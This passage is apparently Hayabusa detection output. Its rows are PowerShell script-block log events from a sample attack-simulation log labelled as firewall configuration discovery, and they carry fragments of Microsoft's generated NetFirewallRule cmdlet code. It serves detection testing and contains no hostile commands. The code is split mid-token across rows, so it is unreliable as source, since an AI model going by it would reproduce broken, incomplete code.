[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 
@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_met",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"hodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } 
# .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] 
${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdle",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"t.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') 